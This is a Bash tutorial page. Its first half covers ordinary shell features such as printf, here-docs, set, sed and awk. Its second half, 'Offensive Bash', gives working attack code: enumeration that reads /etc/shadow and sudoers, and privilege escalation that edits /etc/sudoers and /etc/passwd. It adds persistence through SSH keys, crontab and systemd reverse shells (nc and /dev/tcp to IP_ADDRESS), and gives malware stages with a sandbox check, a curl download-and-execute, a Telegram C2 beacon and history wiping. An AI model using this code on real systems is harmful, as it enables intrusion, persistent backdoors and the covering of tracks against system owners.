echo $(readlink -f $0)             # readlink displays the location pointed to by symbolic links. If $0 is not a symbolic link, it displays the absolute path of the file itself.
echo $(dirname $(readlink -f $0))  # Get the absolute path of the current script
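
The expansions above break on paths containing spaces and give the wrong answer when the script is sourced. A commonly used, more defensive variant (a sketch, not the only way):

```shell
#!/bin/bash

# Quote every expansion, and prefer BASH_SOURCE over $0 so the value
# is still correct when the file is sourced instead of executed.
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
echo "$SCRIPT_DIR"
```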

Align

For bash, use the printf command with alignment flags.

echo "Usage: $0 [option] [value]"
printf "%-16s %-64s\n" -h xxxx

Running this from main.sh prints:

Usage: main.sh [option] [value]
-h               xxxx
  • %s %c %d %f are all format specifiers, %s outputs a string, %d outputs an integer, %c outputs a character, and %f outputs a real number in decimal form.
  • %-10s specifies a width of 10 characters (the - indicates left alignment, otherwise it’s right aligned), any characters will be displayed within the 10-character width, if less it will automatically be padded with spaces, and if it exceeds, the content will be fully displayed.
  • %-4.2f formats a floating-point number with a minimum width of 4, where .2 specifies two digits after the decimal point.
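
A quick demonstration of the width and precision flags:

```shell
# Width 10: left-aligned vs right-aligned
printf '[%-10s]\n' "abc"    # [abc       ]
printf '[%10s]\n'  "abc"    # [       abc]

# %-4.2f: minimum width 4, two digits after the decimal point
printf '[%-4.2f]\n' 3.14159 # [3.14]
```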

Bash Tips

Parameter Substitution

If parameter not set, use default.

${parameter-default}, ${parameter:-default}

GDB=${GDB:-/usr/bin/gdb}
echo $GDB # /usr/bin/gdb
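
${parameter:-default} has several siblings that are worth knowing; a short sketch:

```shell
unset VAR

echo "${VAR:-fallback}"  # use the default; VAR itself stays unset
echo "${VAR:=fallback}"  # use the default AND assign it to VAR
echo "$VAR"              # fallback
echo "${VAR:+isset}"     # "isset", printed only because VAR is now non-empty
# ${VAR:?message}        # would abort the script if VAR were unset or empty
```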

Here document

The cat <<EOF syntax is very useful when working with multi-line text in Bash, e.g. when assigning a multi-line string to a shell variable, file, or pipe.

  • Assign multi-line string to a shell variable
sql=$(cat <<EOF
SELECT foo, bar FROM db
WHERE foo='baz'
EOF
)
echo "$sql"  # quote the variable to preserve the line breaks
  • Pass multi-line string to a file in Bash
cat <<EOF > print.sh
> #!/bin/bash
> echo \$PWD
> echo $PWD
> EOF

The print.sh file now contains:

#!/bin/bash
echo $PWD
echo /home/user
  • Pass multi-line string to a pipe in Bash
cat <<EOF | grep 'b' | tee b.txt
foo
bar
baz
EOF

The b.txt file contains bar and baz lines. The same output is printed to stdout.
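
The escaping shown above (\$PWD vs $PWD) can also be controlled wholesale: quoting the here-document delimiter disables all expansion in the body.

```shell
# Unquoted delimiter: $HOME is expanded by the current shell.
cat <<EOF
$HOME
EOF

# Quoted delimiter: the body is taken literally, nothing is expanded.
cat <<'EOF'
$HOME
EOF
```

The first block prints the value of $HOME (e.g. /home/user); the second prints the literal string $HOME.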

eval

#!/bin/bash

f()
{
    echo "abc"
    exit 1
}

OUTPUT=`eval f`
if [[ $? -ne 0 ]]; then
    printf "error: %s\n" "${OUTPUT}"
else
    printf "ok: %s\n" "${OUTPUT}"
fi
$ ./eval.sh
error: abc

eval is part of POSIX; it is typically provided as a shell built-in.

eval - construct command by concatenating arguments

It will take an argument and construct a command from it, which will then be executed by the shell. This is the example from the manpage:

$ foo=10 x=foo
$ y='$'$x
$ echo $y
$foo
$ eval y='$'$x
$ echo $y
10

  1. In the first line you define $foo with the value '10' and $x with the value 'foo'.
  2. Now define $y, which consists of the string '$foo'. The dollar sign is quoted ('$') so that it is not expanded yet.
  3. To check the result, echo $y.
  4. The result will be the string '$foo'
  5. Now we repeat the assignment with eval. It will first evaluate $x to the string 'foo'. Now we have the statement y=$foo which will get evaluated to y=10.
  6. The result of echo $y is now the value '10'.

set

When executing a Bash script, for example, bash script.sh, a new shell is created, and script.sh is executed within this new shell. This shell is the script’s execution environment, and Bash provides various parameters for this environment by default. The set command is used to modify the operating parameters of the shell environment, allowing customization.


# Treat unset variables as an error when expanding them, rather than silently ignoring them.
set -u

# Print commands and their arguments as they are executed.
set -x

# Exit immediately if a pipeline (which may consist of a single simple command), a list, or a compound command returns a non-zero status.
# `set -e` is based on the return value to determine if a command fails.
# `set +e` turns off the `-e` option, and `set -e` turns it back on.
set -e

# There's an exception to `set -e`, which doesn't apply to pipeline commands.
# In Bash, the return value of a pipeline command is determined by the last sub-command.
# This means that as long as the last sub-command does not fail, the pipeline command will always succeed, and thus subsequent commands will still be executed, making `set -e` ineffective.
# `set -o pipefail` is used to address this situation, causing the entire pipeline command to fail if any sub-command fails, resulting in script termination.
set -o pipefail

Common error handling methods as an alternative to set -e:

# The script stops execution if `command` returns a non-zero status.
command || exit 1

# If two commands are interdependent, the second command is executed only if the first command succeeds.
command1 && command2
# Option 1
command || { echo "command failed"; exit 1; }

# Option 2
if ! command; then
    echo "command failed";
    exit 1;
fi

# Option 3
command
if [ "$?" -ne 0 ]; then
    echo "command failed";
    exit 1;
fi

Summary: the set command's four options above are typically used together. One of the following two styles is recommended at the beginning of all Bash scripts.

Another approach is to pass these parameters from the command line when executing the Bash script: bash -euxo pipefail script.sh

# Style 1
set -euxo pipefail

# Style 2
set -eux
set -o pipefail

cp

# copy file preserving directory path
mkdir test
cp --parents `find . -name "*.gcno"` test

find

find /media/d/ -type f -size +50M ! \( -name "*deb" -o -name "*vmdk" \)

! expression : Negation of a primary; the unary NOT operator.

( expression ): True if expression is true.

expression -o expression: Alternation of primaries; the OR operator. The second expression shall not be evaluated if the first expression is true.

Note that the parentheses, both opening and closing, are prefixed by a backslash (\) to prevent evaluation by the shell.

#!/bin/bash

CORE_FILES=`find /data/home/foo -type f -size +50M -name "*core*"`
if [[ -n $CORE_FILES ]]; then
  rm $CORE_FILES
else
  echo "no core files found"
fi

awk

The awk utility shall execute programs written in the awk programming language, which is specialized for textual data manipulation. An awk program is a sequence of patterns and corresponding actions. When input is read that matches a pattern, the action associated with that pattern is carried out.

Input shall be interpreted as a sequence of records. By default, a record is a line, less its terminating <newline>, but this can be changed by using the RS built-in variable. Each record of input shall be matched in turn against each pattern in the program. For each pattern matched, the associated action shall be executed.

The awk utility shall interpret each input record as a sequence of fields where, by default, a field is a string of non-<blank> non-<newline> characters. This default and field delimiter can be changed by using the FS built-in variable or the -F sepstring option. The awk utility shall denote the first field in a record $1, the second $2, and so on. The symbol $0 shall refer to the entire record; setting any other field causes the re-evaluation of $0. Assigning to $0 shall reset the values of all other fields and the NF built-in variable.

Summing values of a column using awk command

awk '{s+=$1;}END{print s}'
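
For example, summing the numbers 1 through 4:

```shell
# Accumulate field 1 of every record, print the total at the end: 1+2+3+4
seq 1 4 | awk '{s+=$1} END{print s}'   # 10
```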

cut

cut -d "delimiter" -f (field number) file.txt
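
For example, pulling usernames (field 1) out of colon-separated /etc/passwd-style records:

```shell
printf 'root:x:0:0\nbin:x:1:1\n' | cut -d ':' -f 1
# root
# bin
```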

sed

The sed utility is a stream editor that shall read one or more text files, make editing changes according to a script of editing commands, and write the results to standard output. The script shall be obtained from either the script operand string or a combination of the option-arguments from the -e script and -f script_file options.

$ cat tmp
foo
123
foo
456
$ cat tmp | sed -e "1,2s/foo/bar/"
bar
123
foo
456
$ cat tmp | sed -e "s/foo/bar/"
bar
123
bar
456
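
Two more everyday sed idioms: deleting matching lines, and editing a file in place (note that -i behaves differently on BSD/macOS sed, which requires an explicit suffix argument):

```shell
printf 'foo\n123\nfoo\n456\n' > tmp

# Delete every line matching a pattern:
sed '/foo/d' tmp       # prints 123 and 456

# GNU sed: rewrite the file in place (BSD/macOS: sed -i '' 's/foo/bar/g' tmp)
sed -i 's/foo/bar/g' tmp
```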

wait

wait [n ...]
    Wait for each specified process and return its termination status. Each n may be a process ID or a job specification; if a job spec is given, all processes in that job's pipeline
    are waited for. If n is not given, all currently active child processes are waited for, and the return status is zero. If n specifies a non-existent process or job, the return
    status is 127. Otherwise, the return status is the exit status of the last process or job waited for.

#!/bin/bash

CNT=${1:-1}
if [[ "$CNT" -lt 1 ]]; then
    CNT=1
fi

for (( i=0; i<CNT; i++ ))
do
    # Background each iteration so that `wait` actually has jobs to wait for.
    ( sleep 1; echo "hello $i" ) &
done

wait
echo "done"
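
wait can also target a single background job: $! holds the PID of the most recently started background process, and wait then returns that job's exit status. A small sketch:

```shell
#!/bin/bash

# Start a job in the background and remember its PID.
(sleep 1; exit 3) &
pid=$!

# wait returns the exit status of the process waited for.
wait "$pid"
echo "job $pid exited with status $?"   # status is 3
```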

shift

What is the purpose of using shift in shell scripts?

I came across this script:

#! /bin/bash

if (( $# < 3 )); then
  echo "$0 old_string new_string file [file...]"
  exit 0
else
  ostr="$1"; shift
  nstr="$1"; shift
fi

echo "Replacing \"$ostr\" with \"$nstr\""
for file in $@; do
  if [ -f $file ]; then
    echo "Working with: $file"
    eval "sed 's/"$ostr"/"$nstr"/g' $file" > $file.tmp
    mv $file.tmp $file
  fi
done

What is the meaning of the lines where they use shift? I presume the script should be used with at least three arguments, so…?

Answers:

shift is a bash built-in which removes arguments from the beginning of the argument list. Given that the 3 arguments provided to the script are available in $1, $2, $3, a call to shift will make $2 the new $1. A shift 2 will shift by two, making the new $1 the old $3.
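
A tiny standalone demonstration of what shift does to the positional parameters:

```shell
#!/bin/bash
# Invoke as: ./demo.sh a b c d

echo "$1 ($# args)"    # a (4 args)
shift                  # drop the first argument
echo "$1 ($# args)"    # b (3 args)
shift 2                # drop two more
echo "$1 ($# args)"    # d (1 args)
```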

Tricks

https://0x00sec.org/t/use-the-past-to-conquer-the-future-a-how-to-on-bash-history-substitution/12977

!! -> execute last command
!$ -> return last argument
!^ -> return first argument
!* -> return all arguments
!:n -> return the string on nth position
!:n-x -> return position n to x
!:n* -> return all arguments starting with n
!n -> execute command with history number n
!-n -> execute command that was run n commands back
!?str -> execute first command (going up) that matches str
!?str? -> execute first command (going up) that contains str
!:h -> return path up to base filename
!:t -> return only base filename
!:r -> return path up to extension
!:e -> return only extension
!:s/str1/str2 -> substitute first occurrence of str1 with str2
!:gs/str1/str2 -> substitute all occurrences of str1 with str2
!:& -> repeat last successful substitution
!:g& -> repeat last successful substitution and make it global
!:p -> don’t execute, print only

Offensive Bash

Okay, let’s pull everything together and dive into some offensive bash scripting. We’ll start with something basic, using our Linux know-how and what we’ve picked up to write a simple offensive script. We’ll focus on bash tricks that streamline our offensive tactics. And just for kicks, we’ll cap it off with a little malware, for fun, of course. Ready? Let’s get started!

First up, let’s create a tool to gather info about the system. This info can be super handy for things like boosting privileges and staying on a target system once we’ve gained access.

Enumeration

Information Gathering Functions. We’ll call it user_info. This function collects user and group details using commands such as id, lastlog, and w. It gives us info on the current user and group, folks who’ve logged in before, and those logged in now. Plus, it looks out for root accounts, hashes stored in /etc/passwd, readable /etc/shadow files, and other important files.

user_info(){
    echo -e "\n\t${green}${bold}USER AND GROUP INFORMATION${reset}\n"

    user_info=`id`
    echo -e "${red}[+] Current user/group info:${reset}\n$user_info\n"

    # Last login times
    last_logged_users=`lastlog 2>/dev/null | grep -v "Never"`
    if [ "$last_logged_users" ]; then
        echo -e "${red}[+] Users who previously logged into the system:${reset}\n$last_logged_users\n"
    fi


    # Currently logged in users
    logged_in_users=`w`
    if [ "$logged_in_users" ]; then
        echo -e "${red}[+] Users who are currently logged in:${reset}\n$logged_in_users\n"
    fi

    # Check for hashes stored in /etc/passwd
    passwd_hashes=`grep -v '^[^:]*:[x]' /etc/passwd`
    if [ "$passwd_hashes" ]; then
        echo -e "${yellow}[+] /etc/passwd seems to contain hashes!${reset}\n$passwd_hashes\n"
    fi

    # Content of /etc/passwd
    passwd_content=`cat /etc/passwd`
    if [ "$passwd_content" ]; then
        echo -e "${red}[+] Content of /etc/passwd:${reset}\n$passwd_content\n"
    fi

    # /etc/shadow readable?
    shadow_readable=`cat /etc/shadow 2>/dev/null`
    if [ "$shadow_readable" ]; then
        echo -e "${yellow}[+] /etc/shadow can be read!${reset}\n$shadow_readable\n"
    fi

    # Check if /etc/master.passwd can be read (BSD)
    master_passwd_readable=`cat /etc/master.passwd 2>/dev/null`
    if [ "$master_passwd_readable" ]; then
        echo -e "${yellow}[+] master.passwd can be read!${reset}\n$master_passwd_readable\n"
    fi

    # Root accounts (uid 0)
    root_accounts=`grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'`
    if [ "$root_accounts" ]; then
        echo -e "${red}[+] Accounts with root privileges:${reset}\n$root_accounts\n"
    fi

    # View if sensitive files can be read/written
    echo -e "${red}[-] View if sensitive files can be read/written:${reset}"
    ls -la /etc/passwd 2>/dev/null
    ls -la /etc/group 2>/dev/null
    ls -la /etc/profile 2>/dev/null
    ls -la /etc/shadow 2>/dev/null
    ls -la /etc/master.passwd 2>/dev/null

    # Sudoers info
    sudoers_info=`grep -v -e '^$' /etc/sudoers 2>/dev/null | grep -v "#" 2>/dev/null`
    if [ "$sudoers_info" ]; then
        echo -e "${red}[+] Sudoers config:${reset}$sudoers_info\n"
    fi

    # Can sudo be executed without a password?
    sudo_no_password=`echo '' 2>/dev/null | sudo -S -l -k 2>/dev/null`
    if [ "$sudo_no_password" ]; then
        echo -e "${yellow}[+] Sudo can be used without a password!${reset}\n$sudo_no_password\n"
    fi

    # Known binaries that can be executed with sudo - xargs uses only 1 argument
    sudo_binaries=`echo '' | sudo -S -l -k 2>/dev/null | xargs -n 1 2>/dev/null | sed 's/,*$//g' 2>/dev/null | grep -w $binaries 2>/dev/null`
    if [ "$sudo_binaries" ]; then
        echo -e "${yellow}[+] Binaries susceptible to exploitation with sudo:${reset}\n$sudo_binaries\n"
    fi

    # Check if root's home directory is accessible
    root_home_directory=`ls -ahl /root/ 2>/dev/null`
    if [ "$root_home_directory" ]; then
        echo -e "${yellow}[+] We can access the root's home directory!${reset}\n$root_home_directory\n"
    fi

    # Home directory permissions
    home_directory_permissions=`ls -ahl /home/ 2>/dev/null`
    if [ "$home_directory_permissions" ]; then
        echo -e "${red}[+] Home directory permissions:${reset}\n$home_directory_permissions\n"
    fi

    # Search for files that we can write but do not belong to the current user
    writable_files=`find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null`
    if [ "$writable_files" ]; then
        echo -e "${red}[+] Files that can be written to and do not belong to your user:${reset}\n$writable_files\n"
    fi

    # Search for hidden files
    hidden_files=`find / -name ".*" -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -alh {} \; 2>/dev/null`
    if [ "$hidden_files" ]; then
        echo -e "${red}[+] Hidden Files:${reset}\n$hidden_files\n"
    fi

    # Check if root can log in via SSH
    ssh_root_login=`grep "^PermitRootLogin" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | awk '{print $2}'`
    if [ "$ssh_root_login" = "yes" ]; then
        echo -e "${red}[+] Root can log in via SSH: PermitRootLogin yes${reset}\n"
    fi
}

Next, we collect information about the system’s environment, including variables, SELinux status, the $PATH variable configuration, available shells, and the password policies defined in /etc/login.defs

env_info() {
  echo -e "\n\t${green}${bold}ENVIRONMENT INFORMATION${reset}\n"

  # Environment variable information
  env_info=`env 2>/dev/null | grep -v 'LS_COLORS' 2>/dev/null`
  if [ "$env_info" ]; then
    echo -e "${red}[+] Environment variable information:${reset}\n$env_info\n"
  fi

  # Check if SELinux is enabled (MAC security mechanism in the kernel)
  selinux_status=`sestatus 2>/dev/null`
  if [ "$selinux_status" ]; then
    echo -e "${red}[+] SELinux is present on the system:${reset}\n$selinux_status\n"
  fi

  # Configuration of the $PATH variable (stores executable locations)
  path_info=`echo $PATH 2>/dev/null`
  if [ "$path_info" ]; then
    echo -e "${red}[+] PATH Variable:${reset}\n$path_info\n"
  fi

  # Available shells
  shell_info=`cat /etc/shells 2>/dev/null`
  if [ "$shell_info" ]; then
    echo -e "\n${red}[+] Available Shells:${reset}\n$shell_info\n"
  fi

  # Password policy present in the file: /etc/login.defs
  login_defs=`grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null`
  if [ "$login_defs" ]; then
    echo -e "${red}[+] Password policy information:${reset}\n$login_defs\n"
  fi
}

Privilege Escalation

These two functions will be used for privilege-escalation checks: hunting for SUID/SGID files, git credentials, .plan files, etc., and for known kernel exploits based on the system’s kernel version.

misc() {
  echo -e "\n\t${green}${bold}ADDITIONAL CHECKS${reset}\n"

  # Check if known applications for privilege escalation are available
  echo -e "${red}[-] Location of executables that may be useful for privilege escalation:${reset}"
  which nc 2>/dev/null
  which netcat 2>/dev/null
  which wget 2>/dev/null
  which nmap 2>/dev/null
  which gcc 2>/dev/null
  which curl 2>/dev/null

  # List SUID files that may be interesting and are in the binaries list
  int_suid=`find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binaries 2>/dev/null`
  if [ "$int_suid" ]; then
    echo -e "${yellow}[+] Interesting SUID files:${reset}\n$int_suid\n"
  fi

  # Writable SUID files
  w_suid=`find / -perm -4007 -type f -exec ls -la {} \; 2>/dev/null`
  if [ "$w_suid" ]; then
    echo -e "${yellow}[+] Writable SUID files:${reset}\n$w_suid\n"
  fi

  # Writable SUID files owned by root
  w_suid_root=`find / -uid 0 -perm -4007 -type f -exec ls -la {} \; 2>/dev/null`
  if [ "$w_suid_root" ]; then
    echo -e "${yellow}[+] Writable SUID files owned by root:${reset}\n$w_suid_root\n"
  fi

  # Search for SGID files
  find_sgid=`find / -perm -2000 -type f -exec ls -la {} \; 2>/dev/null`
  if [ "$find_sgid" ]; then
    echo -e "\n${red}[+] SGID Files:${reset}\n$find_sgid\n"
  fi

  # List SGID files that may be interesting and are in the binaries list
  int_sgid=`find / -perm -2000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binaries 2>/dev/null`
  if [ "$int_sgid" ]; then
    echo -e "${yellow}[+] Interesting SGID files:${reset}\n$int_sgid\n"
  fi

  # List writable SGID files
  w_sgid=`find / -perm -2007 -type f -exec ls -la {} \; 2>/dev/null`
  if [ "$w_sgid" ]; then
    echo -e "${yellow}[+] Writable SGID files:${reset}\n$w_sgid\n"
  fi

  # Writable SGID files owned by root
  w_sgid_root=`find / -uid 0 -perm -2007 -type f -exec ls -la {} \; 2>/dev/null`
  if [ "$w_sgid_root" ]; then
    echo -e "${yellow}[+] Writable SGID files owned by root:${reset}\n$w_sgid_root\n"
  fi

  # Search for files with git credentials
  git_cred=`find / -name ".git-credentials" 2>/dev/null`
  if [ "$git_cred" ]; then
    echo -e "${yellow}[+] Git credentials saved!:${reset}\n$git_cred\n"
  fi

  # Search for Dockerfiles
  dockerfile_path=$(find / -name "Dockerfile" 2>/dev/null)
  if [ "$dockerfile_path" ]; then
    echo -e "${yellow}[+] Dockerfile found!:${reset}\n$dockerfile_path\n"
  fi

  # Search for .plan files in home directories, may contain useful information
  usr_plan=`find /home -iname "*.plan" -exec ls -la {} \; -exec cat {} \; 2>/dev/null`
  if [ "$usr_plan" ]; then
    echo -e "${red}[+] .plan files content and permissions:${reset}\n$usr_plan\n"
  fi

  # Search for .bkp files
  bkp_files=`find / -iname "*.bkp" -exec ls -la {} \; 2>/dev/null`
  if [ "$bkp_files" ]; then
    echo -e "${red}[+] .bkp files:${reset}\n$bkp_files\n"
  fi

  # Any .rhosts available? - may allow logging in as another user
  rhosts_usr=`find /home -iname "*.rhosts" -exec ls -la {} \; -exec cat {} \; 2>/dev/null`
  if [ "$rhosts_usr" ]; then
    echo -e "${yellow}[+] rhost and content:${reset}\n$rhosts_usr\n"
  fi

  # Check user history files
  usr_hist=`ls -la ~/.*_history 2>/dev/null`
  if [ "$usr_hist" ]; then
    echo -e "${red}[+] Accessible history files:${reset}\n$usr_hist\n"
  fi

  # Check if root history is accessible
  root_hist=`ls -lha /root/.*_history 2>/dev/null`
  if [ "$root_hist" ]; then
    echo -e "${yellow}[+] Root history accessible! May contain passwords!!!${reset}\n$root_hist\n"
  fi
}

Next comes the kernel version and known CVE check. We utilize a series of regular expressions to match the kernel version against a predefined list of known vulnerabilities. If a match is found, the corresponding CVE identifier or exploit reference is displayed. Of course, this is not the best way to do it, but it will work.

Hunt(){
    hits=0
    declare -A exploits
    exploits=(
        ["2.4.(20|25|26|27)"]="CVE-2004-0077"
        ["2.4.29"]="CVE-2004-1235"
        ["2.6.(34|35|36)"]="caps_to_root (https://github.com/SecWiki/linux-kernel-exploits/blob/master/2004/caps_to_root/15916.c)"
    )
    kernel=$(uname -r)
    for exploit in "${!exploits[@]}"; do
        if echo "$kernel" | grep -E -q "$exploit"; then
            echo "${red}${bold}<.>${reset} ${exploits[$exploit]}"
            ((hits++))
        fi
    done
    if [ $hits -eq 0 ]; then
        echo "${red}No exploits found${reset}"
    else
        echo "(${hits} hits)"
    fi
}

Now, let’s use all the gathered system information to boost our privileges. We’ll make a simple function to handle everything we’ve talked about. This function, called escalate, will go through each step we’ve outlined in the conmethods function.

In conmethods, we’ll set up different actions to do things like change system files, exploit weaknesses, and find ways to get more access. These actions are all about making sure we get more control over the system’s important stuff.

So, how does it work? The escalate function is essentially a wrapper around the conmethods function. Inside conmethods, we have a bunch of actions aimed at boosting our privileges.

When we use the escalate function, it kicks off the conmethods function. Then, conmethods does its thing, running through each action we’ve set up. These actions include stuff like tweaking files such as /etc/sudoers and /etc/passwd, exploiting weaknesses like Docker problems, and hunting down files with special access rights or that have been changed recently.

Each action gets checked to see if it works or not. If it works, we’ll see a message saying it did. If not, we’ll know it failed.

escalate() {
  conmethods() {
    cat <<EOF
* Write "\$USER ALL=(ALL) NOPASSWD: ALL" to /etc/sudoers
* Make every user root
* Read doas config
* Exploit Docker bash container exploit
* Attempt to find suid
* Get last edited files
* List all capabilities
EOF

    echo -e "\n"
    read -p "${blue}Press 'Enter' to continue${reset}"

    declare -a methods=(
      "echo '$USER ALL=(ALL) NOPASSWD: ALL' >>/etc/sudoers"
      "sed -i -e 's/x:1000:1000:/x:0:0:/g' /etc/passwd"
      "cat /etc/doas.conf"
      "docker run -it --rm -v $PWD:/mnt bash echo 'toor:\$1\$.ZcF5ts0\$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd 2>/dev/null"
      "find / -perm -4000 2>/dev/null"
      "find / -mmin -10 2>/dev/null | grep -Ev '^/proc'"
      "getcap -r / 2>/dev/null"
    )

    for method in "${methods[@]}"; do
      if eval "$method"; then
        echo -e "$method"
        echo -e "${yellow}[*] Method Succeeded [*]\n${reset}"
        sleep 3
      else
        echo -e "${red}[*] Method Failed! [*]\n${reset}"
      fi
    done
  }

  conmethods
}

Persistence

Let’s talk about known MITRE ATT&CK Persistence Techniques. Persistence consists of techniques used to keep access to systems across restarts, changed credentials, and other interruptions that could cut off access. Techniques used for persistence include any access, action, or configuration change that lets attackers maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.

Gaining an initial foothold is not enough; you need to set up and maintain persistent access to your targets. The techniques outlined under the Persistence tactic provide us with a clear and methodical way of establishing persistence on the target system.

  • Account Manipulation
    • Persistence via SSH Keys
  • Creating a privileged local account
  • Unix shell configuration modification
    • Backdooring the .bashrc file
  • Web Shell/Backdoor
  • Cron jobs

    Persistence via SSH Keys:

SSH keys offer an alternative authentication mechanism for remote access. By adding our public SSH key to the authorized_keys file of a target user’s .ssh directory, we can gain persistent access to the system. This method allows us to authenticate without requiring a password, ensuring ongoing access even if credentials change.

if [[ ! -d /root/.ssh ]]; then
    mkdir /root/.ssh
fi

Once the directory is ensured to exist, the script proceeds to add a public SSH key to the authorized_keys file within the .ssh directory. This is done to enable passwordless SSH access to the root user account.

if [[ -f /root/.ssh/authorized_keys ]]; then
    echo 'PUBLIC_SSH_KEY_HERE' >> /root/.ssh/authorized_keys
else
    touch /root/.ssh/authorized_keys
    echo 'PUBLIC_SSH_KEY_HERE' > /root/.ssh/authorized_keys
fi

If the authorized_keys file already exists, the script appends the public SSH key to it. Otherwise, it creates the file and adds the key.

Cron jobs:

  • Cron is a time-based job scheduler in Unix-like systems. Abusing cron, we can schedule malicious commands or scripts to run at specific intervals, providing us with persistent access to the system. In our script, we modify the system’s crontab to execute a script every 10 minutes (/dev/foo/.proc/proc) and establish a beacon connection every 30 minutes, ensuring continual access.

modifies the system’s crontab file (/etc/crontab) to schedule the execution of a script every 10 minutes and establish a beacon connection every 30 minutes.

echo "*/10 * * * * root /bin/sh /dev/foo/.proc/proc &" >> /etc/crontab
echo "*/30 * * * * root /bin/sh -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc IP_ADDRESS 443 >/tmp/f'" >> /etc/crontab

The first line schedules the execution of /dev/foo/.proc/proc every 10 minutes. This script likely performs actions necessary for maintaining access or executing additional payloads.

The second line schedules the establishment of a beacon connection every 30 minutes. It creates a FIFO pipe (/tmp/f), listens for incoming commands via Netcat (nc), and executes them with Bash (/bin/bash). This setup ensures a continuous channel for remote command execution.

# Persistance via service
# Get shell variable
shell=$(which bash)
touch /etc/systemd/system/network.service
chmod +x /etc/systemd/system/network.service
echo '[Unit]' > /etc/systemd/system/network.service
echo 'Description=Network Service' >> /etc/systemd/system/network.service
echo 'Documentation=man:nc(1)' >> /etc/systemd/system/network.service
echo 'After=network.target' >> /etc/systemd/system/network.service

echo '[Service]' >> /etc/systemd/system/network.service
echo 'Type=simple' >> /etc/systemd/system/network.service
echo 'User=root' >> /etc/systemd/system/network.service
echo "ExecStart=$shell -c 'bash -i >& /dev/tcp/IP_ADDRESS/1111 0>&1'" >> /etc/systemd/system/network.service
echo 'Restart=always' >> /etc/systemd/system/network.service

echo '[Install]' >> /etc/systemd/system/network.service
echo 'WantedBy=multi-user.target' >> /etc/systemd/system/network.service

# Enable on boot and reload daemon + start the new service beacon
systemctl daemon-reload
sleep 1
systemctl enable network.service
systemctl start network.service
sleep 1

Bash and Malware

Yes! Malware can be written in bash, and there are plenty of simple examples out there. However, bash scripts are interpreted, making them susceptible to inspection and analysis by security researchers. That said, many system administrators aren’t researchers, and unlike servers, not all Linux systems are actively monitored or managed by knowledgeable users. In some cases, manual inspection is unlikely.

Plus, we can heavily obfuscate the code to make it harder to analyze, and run thorough tests before deploying it.

Okay, here’s the plan. We’ll start by writing a bunch of Bash scripts, making sure they’re complex and have multiple stages. This way, if one gets caught, we’ve got backups ready to go. Just remember, this is only a proof of concept (PoC). So, we’ll document everything carefully, noting each step it takes on the target system. This way, we’re ready for anything, and we’ve got all the bases covered.

check_root() {
  if [ "$EUID" -ne 0 ]; then
    echo "Please run as root" # Hehe
    rm -rf "$PATH_TEMP_FILE/$NAME_SCRIPT"
    exit
  fi
}

check_curl() {
  apt-get install curl --yes
  apt-get install wget --yes
  yum install curl -y
  yum install wget -y
  rm -rf /var/log/yum*
}

Before we dive in, let’s do a quick internet test. We don’t want any surprises, right? 😉 So, here’s the common workflow: we start by making sure the environment is good to go for execution. Specifically, we check if the script is running with root privileges and if its dependencies, like curl and wget, are installed on the system. If they’re not, we’ll try to install them using both the apt and yum package managers.

if [ "$(cat /proc/version | grep Linux)" ]; then
  : # we are on Linux, carry on
else
  rm foo.sh
  exit 2
fi

# Ensure that it is a systemd system
if [ "$(ps -elf | grep -E '/sbin/init|/lib/systemd/systemd|/usr/lib/systemd/systemd' | grep -v grep)" ]; then
  :
else
  rm foo.sh
  exit 3
fi

# Internet test
interweb=$(ping -c 4 8.8.8.8 | grep "64 bytes" | cut -d " " -f1,2)
if [ "$interweb" ]; then
  echo "Yes internet"
  # would want to put a call out here
else
  echo "No internet"
  # need to think of something to go here as well
fi

# Test for "fake internet access"
fake=$(ping -c 4 999.999.999.999 | grep "64 bytes" | cut -d " " -f1,2)
if [ "$fake" ]; then
  rm foo.sh
  exit 7
else
  :
fi

Okay, here’s the plan: If the conditions aren’t met, we delete ourselves. But if everything looks good, we’ll proceed. We’ll download and install a Telegram bot from a specific endpoint that’s hardcoded into the script. The program will be saved under /usr/share/,

bash ()
{
  curl -s http://10.10.0.0/bash.sh -o "/tmp/bash.sh"
  cd /tmp
  chmod +x bash.sh
  ./bash.sh
}

and then it’ll execute. After that, it’ll call home using the Telegram API with a hardcoded API key. This communication channel will be used to report on the progress of the malware file, its infection and spreading. The helper below sends the second argument (the message) via the Telegram API to the Telegram chat whose ID is given in the first argument:

# MSG_URL="https://api.telegram.org/bot$TOKEN/sendMessage?chat_id="

send_message()
{
  res=$(curl -s --insecure --data-urlencode "text=$2" "$MSG_URL$1&" &)
}

The next function reports to the C2 via the Telegram API that the malware is installed on this host.

tele_send_fase1() {
  # ID_MSG holds the hardcoded chat IDs: 123355992 192828929
  for id in $ID_MSG; do
    send_message "$id" "$(hostname): malw is installed."
  done
}

Alright, once we’ve got everything set up, it’s time to get a bit destructive. Here’s the plan:

First, we’ll check two conditions:

  1. The script is running with root privileges.
  2. The commands dd, uname, and sed are available.
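The checks themselves aren’t shown in the sample. A minimal sketch of both conditions could look like this (the function name have_root_and_tools is my own invention):

```shell
# Sketch of the two gate conditions; the function name is an assumption.
have_root_and_tools() {
  [ "$(id -u)" -eq 0 ] || return 1          # 1. running as root
  local tool
  for tool in dd uname sed; do              # 2. required tools are available
    command -v "$tool" > /dev/null 2>&1 || return 1
  done
  return 0
}
```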

If both conditions are met, the script destroys its own file by first shredding and then removing it, clears and disables the bash history, and deletes the ~/.bash_history file:

function clear_history() {
  # Clear the history for the current shell and destroy the .bash_history file
  set -o history
  history -c
  history -w
  set +o history
  cat /dev/null > "$bash_hist_file"
  # Set history size to zero and point bash_hist_file at /dev/null
  unset bash_hist_file
  bash_hist_file="/dev/null"
  HISTSIZE=0
  HISTFILESIZE=0
}

If those checks pass, shred is used as the preferred wiping command, with just one pass instead of the default three. If shred isn’t installed on the system, dd reading from /dev/urandom is used instead.
